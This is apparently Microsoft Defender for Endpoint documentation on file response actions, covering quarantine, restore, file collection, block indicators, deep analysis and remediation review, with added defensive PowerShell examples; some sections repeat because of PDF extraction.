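# Added example (not from the Microsoft article): restore files that the
# "Stop and Quarantine File" action placed in quarantine under the custom
# enterprise block threat name, once an investigation has cleared them.
# Assumes the default Defender Antivirus path; run elevated on each device.

$MpCmdRun = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
if (-not (Test-Path -LiteralPath $MpCmdRun)) {
    throw "MpCmdRun.exe not found at '$MpCmdRun'"
}

# The two forms of the threat name given in the article.
$ThreatNames = @(
    'EUS:Win32/CustomEnterpriseBlock',
    'EUS:Win32/CustomEnterpriseBlock!cl'
)

# Set to $true to attempt the restore even when the name is not seen in the
# -ListAll output (for example if the listing format differs on this build).
$RestoreEvenIfNotListed = $false

# Read-only first: show what is currently quarantined on this device.
$listing = (& $MpCmdRun -Restore -ListAll 2>&1) | Out-String
Write-Host 'Current quarantine listing:'
Write-Host $listing

foreach ($name in $ThreatNames) {
    # Match the name as a whole token so that the base name does not also
    # match the "!cl" variant (and vice versa).
    $pattern = '(?m)' + [regex]::Escape($name) + '(?=\s|$)'
    $listed  = $listing -match $pattern

    if (-not $listed -and -not $RestoreEvenIfNotListed) {
        Write-Host "No quarantined items listed under '$name'; skipping."
        continue
    }

    # -All restores every quarantined file recorded under this threat name
    # (the article notes this covers files quarantined in the last 30 days).
    Write-Host "Restoring all quarantined files recorded under '$name'..."
    & $MpCmdRun -Restore -Name $name -All
    if ($LASTEXITCODE -ne 0) {
        Write-Warning "MpCmdRun returned exit code $LASTEXITCODE for '$name'."
    }
}
```

Run the listing step alone first if you only want to confirm which threat name the quarantined entries carry on a given device.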

Download or collect file


Selecting Download file from the response actions allows you to download a local,
password-protected .zip archive containing your file. A flyout will appear where you can
record a reason for downloading the file, and set a password.

By default, you should be able to download files that are in quarantine.

The Download file button can have the following states:

Active - You'll be able to collect the file.
Disabled - If the button is grayed out or disabled during an active collection
attempt, you may not have appropriate RBAC permissions to collect files.

The following permissions are required:

For Microsoft Defender XDR Unified role-based access control (RBAC):

Add file collection permission in Microsoft Defender XDR Unified (RBAC)

For Microsoft Defender for Endpoint role-based access control (RBAC):

For Portable Executable file (.exe, .sys, .dll, and others)
Global admin or Advanced live response or Alerts

Non-Portable Executable file (.txt, .docx, and others)
Global admin or Advanced live response

Tenants with role-based access (RBAC) permissions enabled

Download quarantined files


Files that have been quarantined by Microsoft Defender Antivirus or your security team
will be saved in a compliant way according to your sample submission configurations.
Your security team can download the files directly from the file's detail page via the
"Download file" button. This feature is turned 'On' by default.

The location depends on your organization's geo settings (either EU, UK, or US). A
quarantined file will only be collected once per organization. Learn more about
Microsoft's data protection from the Service Trust Portal at https://aka.ms/STP .

Having this setting turned on can help security teams examine potentially bad files and
investigate incidents quickly and in a less risky way. However, if you need to turn off this
setting, go to Settings > Endpoints > Advanced features > Download quarantined
files to adjust the setting. Learn more about advanced features

Backing up quarantined files

Users may be prompted to provide explicit consent before backing up the quarantined
file, depending on your sample submission configuration.

This feature won't work if sample submission is turned off. If automatic sample
submission is set to request permission from the user, only samples that the user agrees
to send will be collected.

Important

Download quarantined file requirements:

Your organization uses Microsoft Defender Antivirus in active mode
Antivirus engine version is 1.1.17300.4 or later. See Monthly platform and
engine versions
Cloud-based protection is enabled. See Turn on cloud-delivered protection
Sample submission is turned on
Devices have Windows 10 version 1703 or later, or Windows Server 2016 or
2019, or Windows Server 2022, or Windows 11

Collect files
If a file isn't already stored by Microsoft Defender for Endpoint, you can't download it.
Instead, you'll see a Collect file button in the same location.

The Collect file button can have the following states:

Active - You'll be able to collect the file.
Disabled - If the button is grayed out or disabled during an active collection
attempt, you may not have appropriate RBAC permissions to collect files.

The following permissions are required:

For Portable Executable file (.exe, .sys, .dll, and others)
Global admin or Advanced live response or Alerts

Non-Portable Executable file (.txt, .docx, and others)
Global admin or Advanced live response

If a file hasn't been seen in the organization in the past 30 days, Collect file will be
disabled.

Important

A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible. This can be due to the system no longer having network credentials to
access the file. Typically, this is a result of a temporary log on to a system or shared
folder and the access tokens expired.

Add indicator to block or allow a file

Prevent further propagation of an attack in your organization by banning potentially
malicious files or suspected malware. If you know a potentially malicious portable
executable (PE) file, you can block it. This operation will prevent it from being read,
written, or executed on devices in your organization.

Important

This feature is available if your organization uses Microsoft Defender Antivirus
and Cloud-delivered protection is enabled. For more information, see Manage
cloud-delivered protection.

The Antimalware client version must be 4.18.1901.x or later.

This feature is designed to prevent suspected malware (or potentially
malicious files) from being downloaded from the web. It currently supports
portable executable (PE) files, including .exe and .dll files. The coverage will be
extended over time.

This response action is available for devices on Windows 10, version 1703 or
later, and Windows 11.

The allow or block function cannot be done on files if the file's classification
exists on the device's cache prior to the allow or block action.

Note

The PE file needs to be in the device timeline for you to be able to take this action.

There may be a couple of minutes of latency between the time the action is taken
and the actual file being blocked.

Enable the block file feature


To start blocking files, you first need to turn the Block or allow feature on in Settings.

Allow or block file


When you add an indicator hash for a file, you can choose to raise an alert and block the
file whenever a device in your organization attempts to run it.

Files automatically blocked by an indicator won't show up in the file's Action center, but
the alerts will still be visible in the Alerts queue.

See manage indicators for more details on blocking and raising alerts on files.

To stop blocking a file, remove the indicator. You can do so via the Edit Indicator action
on the file's profile page. This action will be visible in the same position as the Add
Indicator action, before you added the indicator.

You can also edit indicators from the Settings page, under Rules > Indicators. Indicators
are listed in this area by their file's hash.

Check activity details in Action center


The Action center provides information on actions that were taken on a device or file.
You can view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, such as submission date/time, submitting user,
and if the action succeeded or failed.

Deep analysis

Cyber security investigations are typically triggered by an alert. Alerts are related to one
or more observed files that are often new or unknown. Selecting a file takes you to the
file view where you can see the file's metadata. To enrich the data related to the file, you
can submit the file for deep analysis.

The Deep analysis feature executes a file in a secure, fully instrumented cloud
environment. Deep analysis results show the file's activities, observed behaviors, and
associated artifacts, such as dropped files, registry modifications, and communication
with IPs. Deep analysis currently supports extensive analysis of portable executable (PE)
files (including .exe and .dll files).

Deep analysis of a file takes several minutes. Once the file analysis is complete, the Deep
Analysis tab will update to display a summary and the date and time of the latest
available results.

The deep analysis summary includes a list of observed behaviors, some of which can
indicate malicious activity, and observables, including contacted IPs and files created on
the disk. If nothing was found, these sections will display a brief message.

Results of deep analysis are matched against threat intelligence and any matches will
generate appropriate alerts.

Use the deep analysis feature to investigate the details of any file, usually during an
investigation of an alert or for any other reason where you suspect malicious behavior.
This feature is available at the top of the file's page. Select the three dots to access the
Deep analysis action.

Learn about deep analysis in the following video:


https://www.microsoft.com/en-us/videoplayer/embed/RE4aAYy?rel=0&postJsllMsg=true

Submit for deep analysis is enabled when the file is available in the Defender for
Endpoint backend sample collection, or if it was observed on a Windows 10 device that
supports submitting to deep analysis.

Note

Only files from Windows 10, Windows 11, and Windows Server 2012 R2+ can be
automatically collected.

You can also submit a sample through the Microsoft Defender portal if the file wasn't
observed on a Windows 10 device (or Windows 11 or Windows Server 2012 R2+), and
wait for Submit for deep analysis button to become available.

Note

Due to backend processing flows in the Microsoft Defender portal, there could be
up to 10 minutes of latency between file submission and availability of the deep
analysis feature in Defender for Endpoint.

Submit files for deep analysis


1. Select the file that you want to submit for deep analysis. You can select or search a
file from any of the following views:

Alerts - select the file links from the Description or Details in the Alert Story
timeline
Devices list - select the file links from the Description or Details in the Device
in organization section
Search box - select File from the drop-down menu and enter the file name

2. In the Deep analysis tab of the file view, select Submit.

Note

Only PE files are supported, including .exe and .dll files.

A progress bar is displayed and provides information on the different stages of the
analysis. You can then view the report when the analysis is done.

Note

Depending on device availability, sample collection time can vary. There is a 3-hour
timeout for sample collection. The collection will fail and the operation will abort if
there is no online Windows 10 device (or Windows 11 or Windows Server 2012
R2+) reporting at that time. You can re-submit files for deep analysis to get fresh
data on the file.

View deep analysis reports


View the provided deep analysis report to see more in-depth insights on the file you
submitted. This feature is available in the file view context.

You can view the comprehensive report that provides details on the following sections:

Behaviors
Observables

The details provided can help you investigate if there are indications of a potential
attack.

1. Select the file you submitted for deep analysis.

2. Select the Deep analysis tab. If there are any previous reports, the report summary
will appear in this tab.

Troubleshoot deep analysis


If you come across a problem when trying to submit a file, try each of the following
troubleshooting steps.

1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll
extensions (executable programs or applications).

2. Ensure the service has access to the file, that it still exists, and hasn't been
corrupted or modified.

3. Wait a short while and try to submit the file again. The queue may be full, or there
was a temporary connection or communication error.

4. If the sample collection policy isn't configured, then the default behavior is to allow
sample collection. If it's configured, then verify the policy setting allows sample
collection before submitting the file again. When sample collection is configured,
then check the following registry value:

text

Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value:
Value = 0 - block sample collection
Value = 1 - allow sample collection

5. Change the organizational unit through the Group Policy. For more information,
see Configure with Group Policy.

6. If these steps don't resolve the issue, contact support.
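As an added example (not from the Microsoft article), this PowerShell function performs the check in troubleshooting step 4: it reads AllowSampleCollection from the policy key named above and reports whether sample collection is allowed, treating a missing key or value as the not-configured default. The function name Get-SampleCollectionState is my own.

```powershell
# Added example (not from the Microsoft article): report whether sample
# collection is blocked by policy on this device. Read-only; run elevated
# in PowerShell on the device whose submissions are failing.

function Get-SampleCollectionState {
    $keyPath   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
    $valueName = 'AllowSampleCollection'

    # A missing key or value means the policy is not configured; the article
    # states that the default behaviour is then to allow sample collection.
    $value = $null
    if (Test-Path -LiteralPath $keyPath) {
        $item = Get-ItemProperty -LiteralPath $keyPath -Name $valueName -ErrorAction SilentlyContinue
        if ($null -ne $item) { $value = $item.$valueName }
    }

    if ($null -eq $value) {
        $state = 'Allowed (policy not configured; default behaviour applies)'
    } elseif ($value -eq 0) {
        $state = 'Blocked by policy (AllowSampleCollection = 0)'
    } elseif ($value -eq 1) {
        $state = 'Allowed by policy (AllowSampleCollection = 1)'
    } else {
        # Anything other than 0 or 1 is outside the documented values.
        $state = "Unexpected value $value (expected DWORD 0 or 1)"
    }

    [pscustomobject][ordered]@{
        RegistryPath            = $keyPath
        ValueName               = $valueName
        RawValue                = $value
        State                   = $state
        SampleCollectionAllowed = ($null -eq $value -or $value -eq 1)
    }
}

Get-SampleCollectionState | Format-List
```

If SampleCollectionAllowed is $false, adjust the policy through Group Policy (step 5) and resubmit the file.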

Related topics
Take response actions on a device
Investigate files
Manual response actions in Microsoft Defender for Endpoint Plan 1


Feedback
Was this page helpful?  Yes  No

Provide product feedback


Take response actions on a file
Article • 08/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

) Important

Some information in this article relates to prereleased product which may be


substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Defender for Endpoint? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a


file. After taking action on files, you can check on activity details in the Action center.

Response actions are available on a file's detailed profile page. Once on this page, you
can switch between the new and old page layouts by toggling new File page. The rest of
this article describes the newer page layout.

Response actions run along the top of the file page, and include:

Stop and quarantine file


Manage indicator
Download file
Collect file
Ask Defender Experts
Manual actions
Go hunt
Deep analysis

You can also submit files for deep analysis, to run the file in a secure cloud sandbox.
When the analysis is complete, you'll get a detailed report that provides information
about the behavior of the file. You can submit files for deep analysis and read past
reports by selecting the Deep analysis action.

Some actions require certain permissions. The following table describes what action
certain permissions can take on portable executable (PE) and non-PE files:
ノ Expand table

Permission PE files Non-PE files

View data X X

Alerts investigation ☑ X

Live response basic X X

Live response advanced ☑ ☑

For more information on roles, see Create and manage roles for role-based access
control.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and
quarantining the file where it was observed.

) Important

You can only take this action if:

The device you're taking the action on is running Windows 10, version 1703 or
later, Windows 11, and Windows Server 2012 R2+
The file does not belong to trusted third-party publishers or is not signed by
Microsoft
Microsoft Defender Antivirus must at least be running on Passive mode. For
more information, see Microsoft Defender Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining
the files, and deleting persistent data such as registry keys.

This action takes effect on devices with Windows 10, version 1703 or later, and Windows
11 and Server 2012 R2+, where the file was observed in the last 30 days.

7 Note

You'll be able to restore the file from quarantine at any time.


Stop and quarantine files
1. Select the file you want to stop and quarantine. You can select a file from any of
the following views or use the Search box:

Alerts - select the corresponding links from the Description or Details in the
Alert Story timeline
Search box - select File from the drop-down menu and enter the file name

7 Note

The stop and quarantine file action is limited to a maximum of 1000 devices.
To stop a file on a larger number of devices, see Add indicator to block or
allow file.

2. Go to the top bar and select Stop and Quarantine File.

3. Specify a reason, then select Confirm.


The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Success - Shows the number of devices where the file has been stopped and
quarantined.
Failed - Shows the number of devices where the action failed and details
about the failure.
Pending - Shows the number of devices where the file is yet to be stopped
and quarantined from. This can take time for cases when the device is offline
or not connected to the network.

4. Select any of the status indicators to view more information about the action. For
example, select Failed to see where the action failed.

Notification on device user

When the file is being removed from a device, the following notification is shown:

In the device timeline, a new event is added for each device where a file was stopped
and quarantined.

A warning is shown before the action is implemented for files widely used throughout
an organization. It's to validate that the operation is intended.

Restore file from quarantine


You can roll back and remove a file from quarantine if you've determined that it's clean
after an investigation. Run the following command on each device where the file was
quarantined.

1. Open an elevated command-line prompt on the device:

a. Go to Start and type cmd.

b. Right-click Command prompt and select Run as administrator.

2. Enter the following command, and press Enter:

dos

"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name


EUS:Win32/CustomEnterpriseBlock -All
7 Note

In some scenarios, the ThreatName may appear as:


EUS:Win32/CustomEnterpriseBlock!cl.

Defender for Endpoint will restore all custom blocked files that were
quarantined on this device in the last 30 days.

) Important

A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible. This can be due to the system no longer having network credentials to
access the file. Typically, this is a result of a temporary log on to a system or shared
folder and the access tokens expired.

Download or collect file


Selecting Download file from the response actions allows you to download a local,
password-protected .zip archive containing your file. A flyout will appear where you can
record a reason for downloading the file, and set a password.

By default, you should be able to download files that are in quarantine.

The Download file button can have the following states:

Active - You'll be able to collect the file.

Disabled - If the button is grayed out or disabled during an active collection


attempt, you may not have appropriate RBAC permissions to collect files.

The following permissions are required:

For Microsoft Defender XDR Unified role-based access control (RBAC):


Add file collection permission in Microsoft Defender XDR Unified (RBAC)

For Microsoft Defender for Endpoint role-based access control (RBAC):

For Portable Executable file (.exe, .sys, .dll, and others)


Global admin or Advanced live response or Alerts

Non-Portable Executable file (.txt, .docx, and others)


Global admin or Advanced live response
Tenants with role-based access (RBAC) permissions enabled

Download quarantined files


Files that have been quarantined by Microsoft Defender Antivirus or your security team
will be saved in a compliant way according to your sample submission configurations.
Your security team can download the files directly from the file's detail page via the
"Download file" button. This feature is turned 'On' by default.

The location depends on your organization's geo settings (either EU, UK, or US). A
quarantined file will only be collected once per organization. Learn more about
Microsoft's data protection from the Service Trust Portal at https://aka.ms/STP .

Having this setting turned on can help security teams examine potentially bad files and
investigate incidents quickly and in a less risky way. However, if you need to turn off this
setting, go to Settings > Endpoints > Advanced features > Download quarantined
files to adjust the setting. Learn more about advanced features

Backing up quarantined files

Users may be prompted to provide explicit consent before backing up the quarantined
file, depending on your sample submission configuration.

This feature won't work if sample submission is turned off. If automatic sample
submission is set to request permission from the user, only samples that the user agrees
to send will be collected.

) Important
Download quarantined file requirements:

Your organization uses Microsoft Defender Antivirus in active mode


Antivirus engine version is 1.1.17300.4 or later. See Monthly platform and
engine versions
Cloud–based protection is enabled. See Turn on cloud-delivered protection
Sample submission is turned on
Devices have Windows 10 version 1703 or later, or Windows server 2016 or
2019, or Windows Server 2022, or Windows 11

Collect files
If a file isn't already stored by Microsoft Defender for Endpoint, you can't download it.
Instead, you'll see a Collect file button in the same location.

The Collect file button can have the following states:

Active - You'll be able to collect the file.

Disabled - If the button is grayed out or disabled during an active collection


attempt, you may not have appropriate RBAC permissions to collect files.

The following permissions are required:

For Portable Executable file (.exe, .sys, .dll, and others)


Global admin or Advanced live response or Alerts

Non-Portable Executable file (.txt, .docx, and others)


Global admin or Advanced live response

If a file hasn't been seen in the organization in the past 30 days, Collect file will be
disabled.

) Important

A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible. This can be due to the system no longer having network credentials to
access the file. Typically, this is a result of a temporary log on to a system or shared
folder and the access tokens expired.
Add indicator to block or allow a file
Prevent further propagation of an attack in your organization by banning potentially
malicious files or suspected malware. If you know a potentially malicious portable
executable (PE) file, you can block it. This operation will prevent it from being read,
written, or executed on devices in your organization.

) Important

This feature is available if your organization uses Microsoft Defender Antivirus


and Cloud-delivered protection is enabled. For more information, see Manage
cloud-delivered protection.

The Antimalware client version must be 4.18.1901.x or later.

This feature is designed to prevent suspected malware (or potentially


malicious files) from being downloaded from the web. It currently supports
portable executable (PE) files, including .exe and .dll files. The coverage will be
extended over time.

This response action is available for devices on Windows 10, version 1703 or
later, and Windows 11.

The allow or block function cannot be done on files if the file's classification
exists on the device's cache prior to the allow or block action.

7 Note

The PE file needs to be in the device timeline for you to be able to take this action.

There may be a couple of minutes of latency between the time the action is taken
and the actual file being blocked.

Enable the block file feature


To start blocking files, you first need to turn the Block or allow feature on in Settings.

Allow or block file


When you add an indicator hash for a file, you can choose to raise an alert and block the
file whenever a device in your organization attempts to run it.

Files automatically blocked by an indicator won't show up in the file's Action center, but
the alerts will still be visible in the Alerts queue.

See manage indicators for more details on blocking and raising alerts on files.

To stop blocking a file, remove the indicator. You can do so via the Edit Indicator action
on the file's profile page. This action will be visible in the same position as the Add
Indicator action, before you added the indicator.

You can also edit indicators from the Settings page, under Rules > Indicators. Indicators
are listed in this area by their file's hash.

Check activity details in Action center


The Action center provides information on actions that were taken on a device or file.
You can view the following details:

Investigation package collection


Antivirus scan
App restriction
Device isolation

All other related details are also shown, such as submission date/time, submitting user,
and if the action succeeded or failed.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one
or more observed files that are often new or unknown. Selecting a file takes you to the
file view where you can see the file's metadata. To enrich the data related to the file, you
can submit the file for deep analysis.

The Deep analysis feature executes a file in a secure, fully instrumented cloud
environment. Deep analysis results show the file's activities, observed behaviors, and
associated artifacts, such as dropped files, registry modifications, and communication
with IPs. Deep analysis currently supports extensive analysis of portable executable (PE)
files (including .exe and .dll files).

Deep analysis of a file takes several minutes. Once the file analysis is complete, the Deep
Analysis tab will update to display a summary and the date and time of the latest
available results.

The deep analysis summary includes a list of observed behaviors, some of which can
indicate malicious activity, and observables, including contacted IPs and files created on
the disk. If nothing was found, these sections will display a brief message.

Results of deep analysis are matched against threat intelligence and any matches will
generate appropriate alerts.

Use the deep analysis feature to investigate the details of any file, usually during an
investigation of an alert or for any other reason where you suspect malicious behavior.
This feature is available at the top of the file's page. Select the three dots to access the
Deep analysis action.

Learn about deep analysis in the following video:

https://www.microsoft.com/en-us/videoplayer/embed/RE4aAYy?rel=0&postJsllMsg=true

Submit for deep analysis is enabled when the file is available in the Defender for
Endpoint backend sample collection, or if it was observed on a Windows 10 device that
supports submitting to deep analysis.

Note

Only files from Windows 10, Windows 11, and Windows Server 2012 R2+ can be
automatically collected.

You can also submit a sample through the Microsoft Defender portal if the file wasn't
observed on a Windows 10 device (or Windows 11 or Windows Server 2012 R2+), and
wait for the Submit for deep analysis button to become available.

Note

Due to backend processing flows in the Microsoft Defender portal, there could be
up to 10 minutes of latency between file submission and availability of the deep
analysis feature in Defender for Endpoint.

Submit files for deep analysis

1. Select the file that you want to submit for deep analysis. You can select or search a
file from any of the following views:

Alerts - select the file links from the Description or Details in the Alert Story timeline
Devices list - select the file links from the Description or Details in the Device in organization section
Search box - select File from the drop-down menu and enter the file name

2. In the Deep analysis tab of the file view, select Submit.

Note

Only PE files are supported, including .exe and .dll files.

A progress bar is displayed and provides information on the different stages of the
analysis. You can then view the report when the analysis is done.

Note

Depending on device availability, sample collection time can vary. There is a 3-hour
timeout for sample collection. The collection will fail and the operation will abort if
there is no online Windows 10 device (or Windows 11 or Windows Server 2012
R2+) reporting at that time. You can re-submit files for deep analysis to get fresh
data on the file.

View deep analysis reports

View the provided deep analysis report to see more in-depth insights on the file you
submitted. This feature is available in the file view context.

You can view the comprehensive report that provides details on the following sections:

Behaviors
Observables

The details provided can help you investigate if there are indications of a potential
attack.

1. Select the file you submitted for deep analysis.

2. Select the Deep analysis tab. If there are any previous reports, the report summary
will appear in this tab.

Troubleshoot deep analysis

If you come across a problem when trying to submit a file, try each of the following
troubleshooting steps.

1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll
extensions (executable programs or applications).

2. Ensure the service has access to the file, that it still exists, and hasn't been
corrupted or modified.

3. Wait a short while and try to submit the file again. The queue may be full, or there
was a temporary connection or communication error.

4. If the sample collection policy isn't configured, then the default behavior is to allow
sample collection. If it's configured, then verify the policy setting allows sample
collection before submitting the file again. When sample collection is configured,
then check the following registry value:

```text
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value:
Value = 0 - block sample collection
Value = 1 - allow sample collection
```

5. Change the organizational unit through the Group Policy. For more information,
see Configure with Group Policy.

6. If these steps don't resolve the issue, contact support.
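
The following PowerShell is an added example, not Microsoft's code, that runs steps 1 and 4 above on the device before you submit: it confirms the file is a PE image by its header rather than its extension, reads the AllowSampleCollection policy value (an absent key or value means the default of allowing collection), and records the SHA-256 hash that the file page and file indicators key on. The function names are my own and it assumes it runs on the device that holds the file.

```powershell
# Added example, not part of Microsoft's documentation or product code.
# Pre-flight checks for a deep analysis submission. Function names are hypothetical.
# Run on the device that holds the file (Windows PowerShell 5.1 or PowerShell 7).

function Test-IsPeFile {
    # Step 1: verify the PE structure itself. A PE image starts with the DOS
    # header "MZ" (0x4D 0x5A); the 32-bit value at offset 0x3C (e_lfanew) points
    # to the "PE\0\0" signature. A text file renamed to .exe fails this check.
    param([Parameter(Mandatory)][string]$Path)

    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $false }
    $fs = [System.IO.File]::OpenRead($Path)
    try {
        $dosHeader = New-Object byte[] 0x40
        if ($fs.Read($dosHeader, 0, 0x40) -ne 0x40) { return $false }
        if ($dosHeader[0] -ne 0x4D -or $dosHeader[1] -ne 0x5A) { return $false }

        $peOffset = [System.BitConverter]::ToInt32($dosHeader, 0x3C)
        if ($peOffset -lt 0x40 -or ($peOffset + 4) -gt $fs.Length) { return $false }

        [void]$fs.Seek($peOffset, [System.IO.SeekOrigin]::Begin)
        $sig = New-Object byte[] 4
        if ($fs.Read($sig, 0, 4) -ne 4) { return $false }
        return ($sig[0] -eq 0x50 -and $sig[1] -eq 0x45 -and $sig[2] -eq 0 -and $sig[3] -eq 0)
    }
    finally {
        $fs.Dispose()
    }
}

function Get-SampleCollectionPolicy {
    # Step 4: read the policy value documented above. If the key or the value is
    # absent, the policy is not configured and the default is to allow collection.
    $key  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
    $name = 'AllowSampleCollection'

    $item = Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        return [pscustomobject]@{ Configured = $false; Value = $null; Allowed = $true }
    }
    $value = [int]($item.$name)
    [pscustomobject]@{ Configured = $true; Value = $value; Allowed = ($value -eq 1) }
}

function Test-DeepAnalysisReadiness {
    # Combines both checks and adds the SHA-256 hash, which is what the file page
    # and file indicators key on, so the result can be matched against the portal.
    param([Parameter(Mandatory)][string]$Path)

    $isPe   = Test-IsPeFile -Path $Path
    $policy = Get-SampleCollectionPolicy
    $sha256 = $null
    if (Test-Path -LiteralPath $Path -PathType Leaf) {
        $sha256 = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
    }
    if ($policy.Allowed) { $collection = 'allowed' }
    else { $collection = 'blocked by policy (AllowSampleCollection = 0)' }

    [pscustomobject]@{
        Path             = $Path
        IsPeFile         = $isPe
        Sha256           = $sha256
        PolicyConfigured = $policy.Configured
        SampleCollection = $collection
        ReadyToSubmit    = ($isPe -and $policy.Allowed)
    }
}

# Usage: check a known PE file on this device before selecting Submit for deep analysis.
Test-DeepAnalysisReadiness -Path "$env:windir\System32\notepad.exe" | Format-List
```

A result with IsPeFile false points at step 1, and SampleCollection "blocked by policy" points at step 4 and the Group Policy change in step 5.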

Related topics
Take response actions on a device
Investigate files
Manual response actions in Microsoft Defender for Endpoint Plan 1

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Review remediation actions following an
automated investigation
Article • 07/13/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Remediation actions
When an automated investigation runs, a verdict is generated for each piece of evidence
investigated. Verdicts can be Malicious, Suspicious, or No threats found.

Depending on

the type of threat,
the resulting verdict, and
how your organization's device groups are configured,

remediation actions can occur automatically or only upon approval by your
organization's security operations team.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Here are a few examples:

Example 1: Fabrikam's device groups are set to Full - remediate threats
automatically (the recommended setting). In this case, remediation actions are
taken automatically for artifacts that are considered to be malicious following an
automated investigation (see Review completed actions).

Example 2: Contoso's devices are included in a device group that is set for Semi -
require approval for any remediation. In this case, Contoso's security operations
team must review and approve all remediation actions following an automated
investigation (see Review pending actions).

Example 3: Tailspin Toys has their device groups set to No automated response
(not recommended). In this case, automated investigations do not occur. No
remediation actions are taken or pending, and no actions are logged in the Action
center for their devices (see Manage device groups).

Whether taken automatically or upon approval, an automated investigation and
remediation can result in one or more of the remediation actions:

Quarantine a file
Remove a registry key
Kill a process
Stop a service
Disable a driver
Remove a scheduled task

Review pending actions
1. Go to the Microsoft Defender portal and sign in.

2. In the navigation pane, choose Action center.

3. Review the items on the Pending tab.

4. Select an action to open its flyout pane.

5. In the flyout pane, review the information, and then take one of the following
steps:

Select Open investigation page to view more details about the investigation.
Select Approve to initiate a pending action.
Select Reject to prevent a pending action from being taken.
Select Go hunt to go into Advanced hunting.

Approve or reject remediation actions

For incidents with a remediation status of Pending approval, you can also approve or
reject a remediation action from within the incident.

1. In the navigation pane, go to Incidents & alerts > Incidents.

2. Filter on Pending action for the Automated investigation state (optional).

3. Select an incident name to open its summary page.

4. Select the Evidence and Response tab.

5. Select an item in the list to open its flyout pane.

6. Review the information, and then take one of the following steps:

Select the Approve pending action option to initiate a pending action.
Select the Reject pending action option to prevent a pending action from being taken.

Review completed actions
1. Go to the Microsoft Defender portal and sign in.

2. In the navigation pane, choose Action center.

3. Review the items on the History tab.

4. Select an item to view more details about that remediation action.

Undo completed actions
If you've determined that a device or a file is not a threat, you can undo remediation
actions that were taken, whether those actions were taken automatically or manually. In
the Action center, on the History tab, you can undo any of the following actions:

| Action source | Supported Actions |
|---|---|
| Automated investigation; Manual response actions (see the note below); Microsoft Defender Antivirus | Disable a driver; Isolate device; Quarantine a file; Remove a registry key; Remove a scheduled task; Restrict code execution; Stop a service |

Note

Defender for Endpoint Plan 1 and Microsoft Defender for Business include only
the following manual response actions:

Run antivirus scan
Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file

To undo multiple actions at one time

1. Go to the Action center (https://security.microsoft.com/action-center) and sign in.

2. On the History tab, select the actions that you want to undo. Make sure to select
items that have the same Action type. A flyout pane opens.

3. In the flyout pane, select Undo.

To remove a file from quarantine across multiple devices

1. Go to the Action center (https://security.microsoft.com/action-center) and sign in.

2. On the History tab, select an item that has the Action type Quarantine file.

3. In the flyout pane, select Apply to X more instances of this file, and then select
Undo.

Automation levels, automated investigation results, and resulting actions

Automation levels affect whether certain remediation actions are taken automatically or
only upon approval. Sometimes your security operations team has more steps to take,
depending on the results of an automated investigation. The following table
summarizes automation levels, results of automated investigations, and what to do in
each case.

| Device group setting | Automated investigation results | What to do |
|---|---|---|
| Full - remediate threats automatically (recommended) | A verdict of Malicious is reached for a piece of evidence. Appropriate remediation actions are taken automatically. | Review completed actions |
| Semi - require approval for any remediation | A verdict of either Malicious or Suspicious is reached for a piece of evidence. Remediation actions are pending approval to proceed. | Approve (or reject) pending actions |
| Semi - require approval for core folders remediation | A verdict of Malicious is reached for a piece of evidence. If the artifact is a file or executable and is in an operating system directory, such as the Windows folder or the Program files folder, then remediation actions are pending approval. If the artifact is not in an operating system directory, remediation actions are taken automatically. | 1. Approve (or reject) pending actions. 2. Review completed actions. |
| Semi - require approval for core folders remediation | A verdict of Suspicious is reached for a piece of evidence. Remediation actions are pending approval. | Approve (or reject) pending actions |
| Semi - require approval for non-temp folders remediation | A verdict of Malicious is reached for a piece of evidence. If the artifact is a file or executable that is not in a temporary folder, such as the user's downloads folder or temp folder, remediation actions are pending approval. If the artifact is a file or executable that is in a temporary folder, remediation actions are taken automatically. | 1. Approve (or reject) pending actions. 2. Review completed actions. |
| Semi - require approval for non-temp folders remediation | A verdict of Suspicious is reached for a piece of evidence. Remediation actions are pending approval. | Approve (or reject) pending actions |
| Any of the Full or Semi automation levels | A verdict of No threats found is reached for a piece of evidence. No remediation actions are taken, and no actions are pending approval. | View details and results of automated investigations |
| No automated response (not recommended) | No automated investigations run, so no verdicts are reached, and no remediation actions are taken or awaiting approval. | Consider setting up or changing your device groups to use Full or Semi automation |

All verdicts are tracked in the Action center.

Note

In Defender for Business, automated investigation and remediation capabilities are
preset to use Full - remediate threats automatically. These capabilities are applied
to all devices by default.

Next steps
Learn about live response capabilities
Proactively hunt for threats with advanced hunting
Address false positives/negatives in Microsoft Defender for Endpoint

See also
Overview of automated investigations

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
